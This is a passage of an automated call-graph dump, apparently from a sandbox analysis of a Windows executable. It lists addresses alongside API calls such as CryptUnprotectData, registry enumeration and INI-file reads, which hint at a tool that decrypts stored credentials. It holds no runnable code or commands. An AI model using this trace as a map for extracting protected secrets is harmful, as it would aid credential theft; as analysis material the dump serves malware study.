39106->39104 39106->39107 39107->39100 39107->39103 39108 40dfef CloseHandle 39107->39108 39109 40df78 39107->39109 39110 40df23 GetCurrentProcess DuplicateHandle 39107->39110 39113 40df8f CloseHandle 39107->39113 39108->39107 39109->39108 39109->39113 39114 40dfae _wcsicmp 39109->39114 39110->39107 39111 40df4c memset 39110->39111 39112 41352f 9 API calls 39111->39112 39112->39107 39113->39109 39114->39107 39114->39109 39116 409a74 GetTempFileNameW 39115->39116 39117 409a66 GetWindowsDirectoryW 39115->39117 39116->39028 39117->39116 39118->39030 39120 406bd5 39119->39120 39121 406bad 39119->39121 39123 4066bf free malloc memcpy free free 39120->39123 39128 406c0f 39120->39128 39121->39120 39122 406bba _wcsicmp 39121->39122 39122->39120 39122->39121 39124 406be5 39123->39124 39125 40afcf ??2@YAPAXI ??3@YAXPAX 39124->39125 39124->39128 39126 406bff 39125->39126 39127 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39126->39127 39127->39128 39128->39039 39128->39040 39131 406ed1 39129->39131 39130 407424 39130->39045 39131->39130 39132 40b633 free 39131->39132 39140 406f4e 39132->39140 39133 406f73 memset 39133->39140 39134 407080 free 39134->39140 39135 40718b 39137 4069df memcpy 39135->39137 39149 40730b 39135->39149 39136 4099f4 malloc memcpy free 39136->39140 39150 4071f1 39137->39150 39138 4069df memcpy 39138->39140 39139 4069df memcpy 39142 4070d4 39139->39142 39140->39133 39140->39134 39140->39136 39140->39138 39141 406aa2 memcpy 39140->39141 39140->39142 39143 406a10 memcpy 39140->39143 39141->39140 39142->39130 39142->39135 39142->39139 39145 40717b 39142->39145 39143->39140 39144 4069df memcpy 39144->39150 39146 4069df memcpy 39145->39146 39146->39135 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39130 39149->39147 39149->39148 39150->39144 39150->39149 39152 4069c4 ??3@YAXPAX 39151->39152 39153 4069af 39152->39153 39154 40b633 free 39153->39154 39155 4069ba 39154->39155 39156 40b04b ??3@YAXPAX 39155->39156 39157 4069c2 39156->39157 39157->39011 39158->39045 39159->39045 39160->39045 39161->39070 39163 40aa33 39162->39163 39164 40aa63 39162->39164 39165 40aa44 39163->39165 39166 40aa38 wcslen 39163->39166 39164->39058 39167 40a9ce malloc memcpy free free 39165->39167 39166->39165 39168 40aa4d 39167->39168 39168->39164 39169 40aa51 memcpy 39168->39169 39169->39164 39170->39058 39171->39058 39176 40a980 39172->39176 39173 40a8bb 39173->38918 39173->38919 39174 40a995 _wcsicmp 39174->39176 39175 40a99c wcscmp 39175->39176 39176->39173 39176->39174 39176->39175 39177->38922 39178->38926 39180 40aa23 RegEnumValueW 39179->39180 39180->38933 39180->38934 39182 405335 39181->39182 39183 40522a 39181->39183 39182->38513 39184 40b2cc 27 API calls 39183->39184 39185 405234 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40523a 39186->39187 39226 40b273 39187->39226 39189 405248 _mbscpy _mbscat GetProcAddress 39190 40b273 27 API calls 39189->39190 39191 405279 39190->39191 39229 405211 GetProcAddress 39191->39229 39193 405282 39194 40b273 27 API calls 39193->39194 39195 40528f 39194->39195 39230 405211 GetProcAddress 39195->39230 39197 405298 39198 40b273 27 API calls 39197->39198 39199 4052a5 39198->39199 39231 405211 GetProcAddress 39199->39231 39201 4052ae 39202 40b273 27 API calls 39201->39202 39203 4052bb 39202->39203 39232 405211 GetProcAddress 39203->39232 39205 4052c4 39206 40b273 27 API calls 39205->39206 39207 4052d1 39206->39207 39233 405211 GetProcAddress 39207->39233 39209 4052da 39210 40b273 27 API calls 39209->39210 39211 4052e7 39210->39211 39234 405211 GetProcAddress 39211->39234 39213 4052f0 39214 40b273 27 API calls 39213->39214 39215 4052fd 39214->39215 39235 405211 GetProcAddress 39215->39235 39217 405306 39218 40b273 27 API calls 39217->39218 39227 40b58d 27 API calls 39226->39227 39228 40b18c 39227->39228 39228->39189 39229->39193 39230->39197 39231->39201 39232->39205 39233->39209 39234->39213 39235->39217 39239 405220 39 API calls 39238->39239 39240 405369 39239->39240 39240->38951 39240->38952 39241->38954 39242->38958 39243->38955 39244->38952 39246 40440c FreeLibrary 39245->39246 39247 40436d 39246->39247 39248 40a804 8 API calls 39247->39248 39249 404377 39248->39249 39250 404383 39249->39250 39251 404405 39249->39251 39252 40b273 27 API calls 39250->39252 39251->38523 39251->38524 39251->38525 39253 40438d GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 4043a7 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 4043ba GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043ce GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043e2 GetProcAddress 39260->39261 39262 4043f1 39261->39262 39263 4043f7 39262->39263 39264 40440c FreeLibrary 39262->39264 39263->39251 39264->39251 39266 404413 FreeLibrary 39265->39266 39267 40441e 39265->39267 39266->39267 39267->38540 39268->38536 39270 40447e 39269->39270 39271 40442e 39269->39271 39272 404485 CryptUnprotectData 39270->39272 39273 40449c 39270->39273 39274 40b2cc 27 API calls 39271->39274 39272->39273 39273->38536 39275 404438 39274->39275 39276 40a804 8 API calls 39275->39276 39277 40443e 39276->39277 39278 404445 39277->39278 39279 404467 39277->39279 39280 40b273 27 API calls 39278->39280 39279->39270 39282 404475 FreeLibrary 39279->39282 39281 40444f GetProcAddress 39280->39281 39281->39279 39283 404460 39281->39283 39282->39270 39283->39279 39285 4135f6 39284->39285 39286 4135eb FreeLibrary 39284->39286 39285->38543 39286->39285 39288 4449c4 39287->39288 39289 444a52 39287->39289 39290 40b2cc 27 API calls 39288->39290 39289->38560 39289->38561 39291 4449cb 39290->39291 39292 40a804 8 API calls 39291->39292 39293 4449d1 39292->39293 39294 40b273 27 API calls 39293->39294 39295 4449dc GetProcAddress 39294->39295 39296 40b273 27 API calls 39295->39296 39297 4449f3 GetProcAddress 39296->39297 39298 40b273 27 API calls 39297->39298 39299 444a04 GetProcAddress 39298->39299 39308->38571 39309->38571 39310->38571 39311->38571 39312->38562 39314 403a29 39313->39314 39328 403bed memset memset 39314->39328 39316 403ae7 39341 40b1ab free free 39316->39341 39318 403a3f memset 39322 403a2f 39318->39322 39319 403aef 39319->38579 39320 40a8d0 7 API calls 39320->39322 39321 409d1f 6 API calls 39321->39322 39322->39316 39322->39318 39322->39320 39322->39321 39323 409b98 GetFileAttributesW 39322->39323 39323->39322 39325 40a051 GetFileTime CloseHandle 39324->39325 39326 4039ca CompareFileTime 39324->39326 39325->39326 39326->38579 39327->38578 39329 414c2e 17 API calls 39328->39329 39330 403c38 39329->39330 39331 409719 2 API calls 39330->39331 39332 403c3f wcscat 39331->39332 39333 414c2e 17 API calls 39332->39333 39334 403c61 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c68 wcscat 39335->39336 39342 403af5 39336->39342 39339 403af5 20 API calls 39340 403c95 39339->39340 39340->39322 39341->39319 39343 403b02 39342->39343 39344 40ae18 9 API calls 39343->39344 39352 403b37 39344->39352 39345 403bdb 39346 40aebe FindClose 39345->39346 39347 403be6 39346->39347 39347->39339 39348 40ae18 9 API calls 39348->39352 39349 40ae51 9 API calls 39349->39352 39350 40add4 wcscmp wcscmp 39350->39352 39351 40aebe FindClose 39351->39352 39352->39345 39352->39348 39352->39349 39352->39350 39352->39351 39353 40a8d0 7 API calls 39352->39353 39353->39352 39355 409d1f 6 API calls 39354->39355 39356 404190 39355->39356 39369 409b98 GetFileAttributesW 39356->39369 39358 40419c 39359 4041a7 6 API calls 39358->39359 39360 40435c 39358->39360 39361 40424f 39359->39361 39360->38605 39361->39360 39363 40425e memset 39361->39363 39365 409d1f 6 API calls 39361->39365 39366 40a8ab 9 API calls 39361->39366 39370 414842 39361->39370 39363->39361 39364 404296 wcscpy 39363->39364 39364->39361 39365->39361 39367 4042b6 memset memset _snwprintf wcscpy 39366->39367 39367->39361 39368->38603 39369->39358 39373 41443e 39370->39373 39372 414866 39372->39361 39374 41444b 39373->39374 39375 414451 39374->39375 39376 4144a3 GetPrivateProfileStringW 39374->39376 39377 414491 39375->39377 39378 414455 wcschr 39375->39378 39376->39372 39380 414495 WritePrivateProfileStringW 39377->39380 39378->39377 39379 414463 _snwprintf 39378->39379 39379->39380 39380->39372 39381->38609 39383 40b2cc 27 API calls 39382->39383 39384 409615 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 409625 39385->39386 39411 409b98 GetFileAttributesW 39386->39411 39388 409634 39389 409648 39388->39389 39412 4091b8 memset 39388->39412 39391 40b2cc 27 API calls 39389->39391 39394 408801 39389->39394 39392 40965d 39391->39392 39393 409d1f 6 API calls 39392->39393 39395 40966d 39393->39395 39394->38612 39394->38639 39464 409b98 GetFileAttributesW 39395->39464 39397 40967c 39397->39394 39398 409681 39397->39398 39465 409529 72 API calls 39398->39465 39400 409690 39400->39394 39411->39388 39466 40a6e6 WideCharToMultiByte 39412->39466 39414 409202 39467 444432 39414->39467 39417 40b273 27 API calls 39418 409236 39417->39418 39513 438552 39418->39513 39444 40951d 39444->39389 39464->39397 39465->39400 39466->39414 39468 4438b5 11 API calls 39467->39468 39469 44444c 39468->39469 39470 409215 39469->39470 39563 415a6d 39469->39563 39470->39417 39470->39444 39472 4442e6 11 API calls 39474 44469e 39472->39474 39473 444486 39475 4444b9 memcpy 39473->39475 39512 4444a4 39473->39512 39474->39470 39477 443d90 111 API calls 39474->39477 39567 415258 39475->39567 39477->39470 39478 444524 39479 444541 39478->39479 39480 44452a 39478->39480 39570 444316 39479->39570 39481 416935 16 API calls 39480->39481 39481->39512 39512->39472 39684 438460 39513->39684 39564 415a77 39563->39564 39565 415a8d 39564->39565 39566 415a7e memset 39564->39566 39565->39473 39566->39565 39568 4438b5 11 API calls 39567->39568 39569 41525d 39568->39569 39569->39478 39696 41703f 39684->39696 39686 43847a 39687 43848a 39686->39687 39688 43847e 39686->39688 39703 438270 39687->39703 39733 4446ea 11 API calls 39688->39733 39697 417044 39696->39697 39698 41705c 39696->39698 39700 416760 11 API calls 39697->39700 39702 417055 39697->39702 39699 417075 39698->39699 39701 41707a 11 API calls 39698->39701 39699->39686 39700->39702 39701->39697 39702->39686 39834 413f4f 39807->39834 39810 413f37 K32GetModuleFileNameExW 39811 413f4a 39810->39811 39811->38672 39813 413969 wcscpy 39812->39813 39814 41396c wcschr 39812->39814 39824 413a3a 39813->39824 39814->39813 39816 41398e 39814->39816 39839 4097f7 wcslen wcslen _memicmp 39816->39839 39818 41399a 39819 4139a4 memset 39818->39819 39820 4139e6 39818->39820 39840 409dd5 GetWindowsDirectoryW wcscpy 39819->39840 39822 413a31 wcscpy 39820->39822 39823 4139ec memset 39820->39823 39822->39824 39841 409dd5 GetWindowsDirectoryW wcscpy 39823->39841 39824->38672 39825 4139c9 wcscpy wcscat 39825->39824 39827 413a11 memcpy wcscat 39827->39824 39829 413cb0 GetModuleHandleW 39828->39829 39830 413cda 39828->39830 39829->39830 39833 413cbf GetProcAddress 39829->39833 39831 413ce3 GetProcessTimes 39830->39831 39832 413cf6 39830->39832 39831->38674 39832->38674 39833->39830 39835 413f2f 39834->39835 39836 413f54 39834->39836 39835->39810 39835->39811 39837 40a804 8 API calls 39836->39837 39838 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39837->39838 39838->39835 39839->39818 39840->39825 39841->39827 39842->38694 39843->38717 39845 409cf9 GetVersionExW 39844->39845 39846 409d0a 39844->39846 39845->39846 39846->38723 39846->38729 39847->38730 39848->38734 39849->38736 39850->38802 39852 40bba5 39851->39852 39896 40cc26 39852->39896 39855 40bd4b 39924 40cc0c 39855->39924 39860 40b2cc 27 API calls 39861 40bbef 39860->39861 39917 40ccf0 39861->39917 39863 40bbf5 39863->39855 39921 40ccb4 39863->39921 39866 40cf04 17 API calls 39867 40bc2e 39866->39867 39868 40bd43 39867->39868 39869 40b2cc 27 API calls 39867->39869 39870 40cc0c 4 API calls 39868->39870 39871 40bc40 39869->39871 39870->39855 39872 40ccf0 _wcsicmp 39871->39872 39873 40bc46 39872->39873 39873->39868 39874 40bc61 memset memset WideCharToMultiByte 39873->39874 39931 40103c strlen 39874->39931 39876 40bcc0 39877 40b273 27 API calls 39876->39877 39878 40bcd0 memcmp 39877->39878 39878->39868 39879 40bce2 39878->39879 39880 404423 38 API calls 39879->39880 39881 40bd10 39880->39881 39881->39868 39882 40bd3a LocalFree 39881->39882 39883 40bd1f memcpy 39881->39883 39882->39868 39883->39882 39884->38817 39885->38854 39886->38854 39887->38854 39888->38854 39889->38854 39890->38854 39891->38854 39892->38854 39893->38854 39894->38829 39895->38851 39932 4096c3 CreateFileW 39896->39932 39898 40cc34 39899 40cc3d GetFileSize 39898->39899 39907 40bbca 39898->39907 39900 40afcf 2 API calls 39899->39900 39901 40cc64 39900->39901 39933 40a2ef ReadFile 39901->39933 39903 40cc71 39934 40ab4a MultiByteToWideChar 39903->39934 39905 40cc95 CloseHandle 39906 40b04b ??3@YAXPAX 39905->39906 39906->39907 39907->39855 39908 40cf04 39907->39908 39909 40b633 free 39908->39909 39910 40cf14 39909->39910 39940 40b1ab free free 39910->39940 39912 40cf1b 39913 40cfef 39912->39913 39916 40bbdd 39912->39916 39941 40cd4b 39912->39941 39915 40cd4b 14 API calls 39913->39915 39915->39916 39916->39855 39916->39860 39918 40ccfd 39917->39918 39920 40cd3f 39917->39920 39919 40cd26 _wcsicmp 39918->39919 39918->39920 39919->39918 39919->39920 39920->39863 39922 40aa29 6 API calls 39921->39922 39923 40bc26 39922->39923 39923->39866 39925 40b633 free 39924->39925 39926 40cc15 39925->39926 39927 40aa04 free 39926->39927 39928 40cc1d 39927->39928 39982 40b1ab free free 39928->39982 39930 40b7d4 memset CreateFileW 39930->38809 39930->38810 39931->39876 39932->39898 39933->39903 39935 40ab93 39934->39935 39936 40ab6b 39934->39936 39935->39905 39937 40a9ce 4 API calls 39936->39937 39938 40ab74 39937->39938 39939 40ab7c MultiByteToWideChar 39938->39939 39939->39935 39940->39912 39942 40cd7b 39941->39942 39943 40aa29 6 API calls 39942->39943 39947 40cd89 39943->39947 39944 40cef5 39945 40aa04 free 39944->39945 39946 40cefd 39945->39946 39946->39912 39947->39944 39948 40aa29 6 API calls 39947->39948 39949 40ce1d 39948->39949 39950 40aa29 6 API calls 39949->39950 39951 40ce3e 39950->39951 39952 40ce6a 39951->39952 39975 40abb7 wcslen memmove 39951->39975 39953 40ce9f 39952->39953 39978 40abb7 wcslen memmove 39952->39978 39956 40a8d0 7 API calls 39953->39956 39959 40ceb5 39956->39959 39957 40ce56 39976 40aa71 wcslen 39957->39976 39958 40ce8b 39979 40aa71 wcslen 39958->39979 39963 40a8d0 7 API calls 39959->39963 39962 40ce5e 39977 40abb7 wcslen memmove 39962->39977 39966 40cecb 39963->39966 39964 40ce93 39980 40abb7 wcslen memmove 39964->39980 39981 40d00b malloc memcpy free free 39966->39981 39969 40cedd 39970 40aa04 free 39969->39970 39971 40cee5 39970->39971 39972 40aa04 free 39971->39972 39973 40ceed 39972->39973 39974 40aa04 free 39973->39974 39974->39944 39975->39957 39976->39962 39977->39952 39978->39958 39979->39964 39980->39953 39981->39969 39982->39930 39983->38869 39984->38877 39985 442774 39986 442799 39985->39986 39987 44277b 39985->39987 40010 42bf4c 14 API calls 39986->40010 40002 42b63e 39987->40002 39991 4427a5 40011 42bfcf memcpy 39991->40011 39994 4427ba 40012 42c00a 11 API calls 39994->40012 39996 441897 39997 4418ea 39996->39997 39998 442bd4 39996->39998 39999 4418e2 39996->39999 39998->39997 40014 441409 memset 39998->40014 39999->39997 40013 4414a9 12 API calls 39999->40013 40015 42b4ec 40002->40015 40004 42b64c 40021 42b5e4 40004->40021 40006 42b65e 40007 42b66d 40006->40007 40028 42b3c6 11 API calls 40006->40028 40009 42b1b5 17 API calls 40007->40009 40009->39986 40010->39991 40011->39994 40012->39996 40013->39997 40014->39998 40018 42b4ff 40015->40018 40016 415a91 memset 40017 42b52c 40016->40017 40019 42b553 memcpy 40017->40019 40020 42b545 40017->40020 40018->40016 40019->40020 40020->40004 40022 42b5eb 40021->40022 40026 42b604 40021->40026 40029 42b896 memset 40022->40029 40024 42b5f5 40030 42b896 memset 40024->40030 40026->40006 40027 42b5ff 40027->40006 40028->40007 40029->40024 40030->40027 40031 4147f3 40034 414561 40031->40034 40033 414813 40035 41456d 40034->40035 40036 41457f GetPrivateProfileIntW 40034->40036 40039 4143f1 memset _itow WritePrivateProfileStringW 40035->40039 40036->40033 40038 41457a 40038->40033 40039->40038 40040 44def7 40041 44df07 40040->40041 40042 44df00 ??3@YAXPAX 40040->40042 40043 44df17 40041->40043 40044 44df10 ??3@YAXPAX 40041->40044 40042->40041 40045 44df27 40043->40045 40046 44df20 ??3@YAXPAX 40043->40046 40044->40043 40047 44df37 40045->40047 40048 44df30 ??3@YAXPAX 40045->40048 40046->40045 40048->40047 40049 4148b6 FindResourceW 40050 4148cf SizeofResource 40049->40050 40053 4148f9 40049->40053 40051 4148e0 LoadResource 40050->40051 40050->40053 40052 4148ee LockResource 40051->40052 40051->40053 40052->40053 40054 441b3f 40064 43a9f6 40054->40064 40056 441b61 40237 4386af memset 40056->40237 40058 44189a 40059 442bd4 40058->40059 40060 4418e2 40058->40060 40061 4418ea 40059->40061 40239 441409 memset 40059->40239 40060->40061 40238 4414a9 12 API calls 40060->40238 40065 43aa20 40064->40065 40066 43aadf 40064->40066 40065->40066 40067 43aa34 memset 40065->40067 40066->40056 40068 43aa56 40067->40068 40069 43aa4d 40067->40069 40240 43a6e7 40068->40240 40248 42c02e memset 40069->40248 40074 43aad3 40250 4169a7 11 API calls 40074->40250 40075 43aaae 40075->40066 40075->40074 40090 43aae5 40075->40090 40077 43ac18 40079 43ac47 40077->40079 40252 42bbd5 memcpy memcpy memcpy memset memcpy 40077->40252 40080 43aca8 40079->40080 40253 438eed 16 API calls 40079->40253 40084 43acd5 40080->40084 40255 4233ae 11 API calls 40080->40255 40083 43ac87 40254 4233c5 16 API calls 40083->40254 40256 423426 11 API calls 40084->40256 40088 43ace1 40257 439811 164 API calls 40088->40257 40089 43a9f6 162 API calls 40089->40090 40090->40066 40090->40077 40090->40089 40251 439bbb 22 API calls 40090->40251 40092 43acfd 40098 43ad2c 40092->40098 40258 438eed 16 API calls 40092->40258 40094 43ad19 40259 4233c5 16 API calls 40094->40259 40096 43ad58 40260 44081d 164 API calls 40096->40260 40098->40096 40100 43add9 40098->40100 40100->40100 40264 423426 11 API calls 40100->40264 40101 43ae3a memset 40102 43ae73 40101->40102 40265 42e1c0 148 API calls 40102->40265 40103 43adab 40262 438c4e 164 API calls 40103->40262 40105 43ad6c 40105->40066 40105->40103 40261 42370b memset memcpy memset 40105->40261 40107 43ae96 40266 42e1c0 148 API calls 40107->40266 40109 43adcc 40263 440f84 12 API calls 40109->40263 40112 43aea8 40113 43aec1 40112->40113 40267 42e199 148 API calls 40112->40267 40115 43af00 40113->40115 40268 42e1c0 148 API calls 40113->40268 40115->40066 40118 43af1a 40115->40118 40119 43b3d9 40115->40119 40269 438eed 16 API calls 40118->40269 40124 43b3f6 40119->40124 40131 43b4c8 40119->40131 40121 43b60f 40121->40066 40328 4393a5 17 API calls 40121->40328 40122 43af2f 40270 4233c5 16 API calls 40122->40270 40310 432878 12 API calls 40124->40310 40126 43af51 40271 423426 11 API calls 40126->40271 40129 43af7d 40272 423426 11 API calls 40129->40272 40130 43b4f2 40317 43a76c 21 API calls 40130->40317 40131->40130 40316 42bbd5 memcpy memcpy memcpy memset memcpy 40131->40316 40135 43b529 40318 44081d 164 API calls 40135->40318 40136 43b428 40164 43b462 40136->40164 40311 432b60 16 API calls 40136->40311 40137 43af94 40273 423330 11 API calls 40137->40273 40141 43b47e 40150 43b497 40141->40150 40313 42374a memcpy memset memcpy memcpy memcpy 40141->40313 40142 43b544 40152 43b55c 40142->40152 40319 42c02e memset 40142->40319 40143 43afca 40274 423330 11 API calls 40143->40274 40148 43afdb 40275 4233ae 11 API calls 40148->40275 40314 4233ae 11 API calls 40150->40314 40151 43b4b1 40315 423399 11 API calls 40151->40315 40320 43a87a 164 API calls 40152->40320 40154 43b56c 40157 43b58a 40154->40157 40321 423330 11 API calls 40154->40321 40156 43afee 40276 44081d 164 API calls 40156->40276 40322 440f84 12 API calls 40157->40322 40159 43b4c1 40324 42db80 164 API calls 40159->40324 40163 43b592 40323 43a82f 16 API calls 40163->40323 40312 423330 11 API calls 40164->40312 40167 43b5b4 40325 438c4e 164 API calls 40167->40325 40169 43b5cf 40326 42c02e memset 40169->40326 40171 43b005 40171->40066 40176 43b01f 40171->40176 40277 42d836 164 API calls 40171->40277 40172 43b1ef 40287 4233c5 16 API calls 40172->40287 40174 43b212 40288 423330 11 API calls 40174->40288 40176->40172 40285 423330 11 API calls 40176->40285 40286 42d71d 164 API calls 40176->40286 40178 43add4 40178->40121 40327 438f86 16 API calls 40178->40327 40181 43b087 40278 4233ae 11 API calls 40181->40278 40182 43b22a 40289 42ccb5 11 API calls 40182->40289 40185 43b10f 40281 423330 11 API calls 40185->40281 40186 43b23f 40290 4233ae 11 API calls 40186->40290 40188 43b257 40291 4233ae 11 API calls 40188->40291 40192 43b129 40282 4233ae 11 API calls 40192->40282 40193 43b26e 40292 4233ae 11 API calls 40193->40292 40195 43b09a 40195->40185 40279 42cc15 19 API calls 40195->40279 40280 4233ae 11 API calls 40195->40280 40197 43b282 40293 43a87a 164 API calls 40197->40293 40199 43b13c 40283 440f84 12 API calls 40199->40283 40201 43b29d 40294 423330 11 API calls 40201->40294 40204 43b15f 40284 4233ae 11 API calls 40204->40284 40205 43b2af 40207 43b2b8 40205->40207 40208 43b2ce 40205->40208 40295 4233ae 11 API calls 40207->40295 40296 440f84 12 API calls 40208->40296 40211 43b2c9 40298 4233ae 11 API calls 40211->40298 40212 43b2da 40297 42370b memset memcpy memset 40212->40297 40215 43b2f9 40299 423330 11 API calls 40215->40299 40217 43b30b 40300 423330 11 API calls 40217->40300 40219 43b325 40301 423399 11 API calls 40219->40301 40221 43b332 40302 4233ae 11 API calls 40221->40302 40223 43b354 40303 423399 11 API calls 40223->40303 40225 43b364 40304 43a82f 16 API calls 40225->40304 40227 43b370 40305 42db80 164 API calls 40227->40305 40229 43b380 40306 438c4e 164 API calls 40229->40306 40231 43b39e 40307 423399 11 API calls 40231->40307 40233 43b3ae 40308 43a76c 21 API calls 40233->40308 40235 43b3c3 40309 423399 11 API calls 40235->40309 40237->40058 40238->40061 40239->40059 40241 43a6f5 40240->40241 40242 43a765 40240->40242 40241->40242 40329 42a115 40241->40329 40242->40066 40249 4397fd memset 40242->40249 40246 43a73d 40246->40242 40247 42a115 148 API calls 40246->40247 40247->40242 40248->40068 40249->40075 40250->40066 40251->40090 40252->40079 40253->40083 40254->40080 40255->40084 40256->40088 40257->40092 40258->40094 40259->40098 40260->40105 40261->40103 40262->40109 40263->40178 40264->40101 40265->40107 40266->40112 40267->40113 40268->40113 40269->40122 40270->40126 40271->40129 40272->40137 40273->40143 40274->40148 40275->40156 40276->40171 40277->40181 40278->40195 40279->40195 40280->40195 40281->40192 40282->40199 40283->40204 40284->40176 40285->40176 40286->40176 40287->40174 40288->40182 40289->40186 40290->40188 40291->40193 40292->40197 40293->40201 40294->40205 40295->40211 40296->40212 40297->40211 40298->40215 40299->40217 40300->40219 40301->40221 40302->40223 40303->40225 40304->40227 40305->40229 40306->40231 40307->40233 40308->40235 40309->40178 40310->40136 40311->40164 40312->40141 40313->40150 40314->40151 40315->40159 40316->40130 40317->40135 40318->40142 40319->40152 40320->40154 40321->40157 40322->40163 40323->40159 40324->40167 40325->40169 40326->40178 40327->40121 40328->40066 40330 42a175 40329->40330 40332 42a122 40329->40332 40330->40242 40335 42b13b 148 API calls 40330->40335 40332->40330 40333 42a115 148 API calls 40332->40333 40336 43a174 40332->40336 40360 42a0a8 148 API calls 40332->40360 40333->40332 40335->40246 40350 43a196 40336->40350 40351 43a19e 40336->40351 40337 43a306 40337->40350 40376 4388c4 14 API calls 40337->40376 40340 42a115 148 API calls 40340->40351 40341 415a91 memset 40341->40351 40342 43a642 40342->40350 40379 4169a7 11 API calls 40342->40379 40346 43a635 40378 42c02e memset 40346->40378 40350->40332 40351->40337 40351->40340 40351->40341 40351->40350 40361 42ff8c 40351->40361 40369 4165ff 40351->40369 40372 439504 13 API calls 40351->40372 40373 4312d0 148 API calls 40351->40373 40374 42be4c memcpy memcpy memcpy memset memcpy 40351->40374 40375 43a121 11 API calls 40351->40375 40353 43a325 40353->40342 40353->40346 40353->40350 40354 4169a7 11 API calls 40353->40354 40355 42b5b5 memset memcpy 40353->40355 40356 42bf4c 14 API calls 40353->40356 40357 42b63e 14 API calls 40353->40357 40359 4165ff 11 API calls 40353->40359 40377 42bfcf memcpy 40353->40377 40354->40353 40355->40353 40356->40353 40357->40353 40359->40353 40360->40332 40380 43817e 40361->40380 40363 42ff99 40364 42ffe3 40363->40364 40365 42ffd0 40363->40365 40368 42ff9d 40363->40368 40385 4169a7 11 API calls 40364->40385 40384 4169a7 11 API calls 40365->40384 40368->40351 40370 4165a0 11 API calls 40369->40370 40371 41660d 40370->40371 40371->40351 40372->40351 40373->40351 40374->40351 40375->40351 40376->40353 40377->40353 40378->40342 40379->40350 40381 438187 40380->40381 40383 438192 40380->40383 40386 4380f6 40381->40386 40383->40363 40384->40368 40385->40368 40388 43811f 40386->40388 40387 438164 40387->40383 40388->40387 40390 4300e8 3 API calls 40388->40390 40391 437e5e 40388->40391 40390->40388 40414 437d3c 40391->40414 40393 437eb3 40393->40388 40394 437ea9 40394->40393 40400 437f22 40394->40400 40429 41f432 40394->40429 40397 437f06 40477 415c56 11 API calls 40397->40477 40399 437f95 40478 415c56 11 API calls 40399->40478 40401 437f7f 40400->40401 40402 432d4e 3 API calls 40400->40402 40401->40399 40404 43802b 40401->40404 40402->40401 40405 4165ff 11 API calls 40404->40405 40406 438054 40405->40406 40440 437371 40406->40440 40409 43806b 40410 438094 40409->40410 40479 42f50e 139 API calls 40409->40479 40412 437fa3 40410->40412 40413 4300e8 3 API calls 40410->40413 40412->40393 40480 41f638 104 API calls 40412->40480 40413->40412 40415 437d69 40414->40415 40418 437d80 40414->40418 40481 437ccb 11 API calls 40415->40481 40417 437d76 40417->40394 40418->40417 40419 437da3 40418->40419 40420 437d90 40418->40420 40422 438460 134 API calls 40419->40422 40420->40417 40485 437ccb 11 API calls 40420->40485 40425 437dcb 40422->40425 40424 437de8 40484 424f26 123 API calls 40424->40484 40425->40424 40482 444283 13 API calls 40425->40482 40427 437dfc 40483 437ccb 11 API calls 40427->40483 40430 41f54d 40429->40430 40436 41f44f 40429->40436 40431 41f466 40430->40431 40515 41c635 memset memset 40430->40515 40431->40397 40431->40400 40436->40431 40438 41f50b 40436->40438 40486 41f1a5 40436->40486 40511 41c06f memcmp 40436->40511 40512 41f3b1 90 API calls 40436->40512 40513 41f398 86 API calls 40436->40513 40438->40430 40438->40431 40514 41c295 86 API calls 40438->40514 40441 41703f 11 API calls 40440->40441 40442 437399 40441->40442 40443 43739d 40442->40443 40446 4373ac 40442->40446 40517 4446ea 11 API calls 40443->40517 40445 4373a7 40445->40409 40447 416935 16 API calls 40446->40447 40448 4373ca 40447->40448 40450 438460 134 API calls 40448->40450 40454 4251c4 137 API calls 40448->40454 40458 415a91 memset 40448->40458 40461 43758f 40448->40461 40473 437584 40448->40473 40476 437d3c 135 API calls 40448->40476 40516 415308 free 40448->40516 40518 425433 13 API calls 40448->40518 40519 425413 17 API calls 40448->40519 40520 42533e 16 API calls 40448->40520 40521 42538f 16 API calls 40448->40521 40522 42453e 123 API calls 40448->40522 40449 4375bc 40452 415c7d 16 API calls 40449->40452 40450->40448 40453 4375d2 40452->40453 40453->40445 40455 4442e6 11 API calls 40453->40455 40454->40448 40456 4375e2 40455->40456 40456->40445 40525 444283 13 API calls 40456->40525 40458->40448 40523 42453e 123 API calls 40461->40523 40462 4375f4 40467 437620 40462->40467 40468 43760b 40462->40468 40466 43759f 40469 416935 16 API calls 40466->40469 40471 416935 16 API calls 40467->40471 40526 444283 13 API calls 40468->40526 40469->40473 40471->40445 40473->40449 40524 42453e 123 API calls 40473->40524 40474 437612 memcpy 40474->40445 40476->40448 40477->40393 40478->40412 40479->40410 40480->40393 40481->40417 40482->40427 40483->40424 40484->40417 40485->40417 40487 41bc3b 101 API calls 40486->40487 40488 41f1b4 40487->40488 40489 41edad 86 API calls 40488->40489 40496 41f282 40488->40496 40490 41f1cb 40489->40490 40491 41f1f5 memcmp 40490->40491 40492 41f20e 40490->40492 40490->40496 40491->40492 40493 41f21b memcmp 40492->40493 40492->40496 40494 41f326 40493->40494 40497 41f23d 40493->40497 40495 41ee6b 86 API calls 40494->40495 40494->40496 40495->40496 40496->40436 40497->40494 40498 41f28e memcmp 40497->40498 40500 41c8df 56 API calls 40497->40500 40498->40494 40499 41f2a9 40498->40499 40499->40494 40502 41f308 40499->40502 40503 41f2d8 40499->40503 40501 41f269 40500->40501 40501->40494 40504 41f287 40501->40504 40505 41f27a 40501->40505 40502->40494 40509 4446ce 11 API calls 40502->40509 40506 41ee6b 86 API calls 40503->40506 40504->40498 40507 41ee6b 86 API calls 40505->40507 40508 41f2e0 40506->40508 40507->40496 40510 41b1ca memset 40508->40510 40509->40494 40510->40496 40511->40436 40512->40436 40513->40436 40514->40430 40515->40431 40516->40448 40517->40445 40518->40448 40519->40448 40520->40448 40521->40448 40522->40448 40523->40466 40524->40449 40525->40462 40526->40474 40527 441819 40530 430737 40527->40530 40529 441825 40531 430756 40530->40531 40543 43076d 40530->40543 40532 430774 40531->40532 40533 43075f 40531->40533 40545 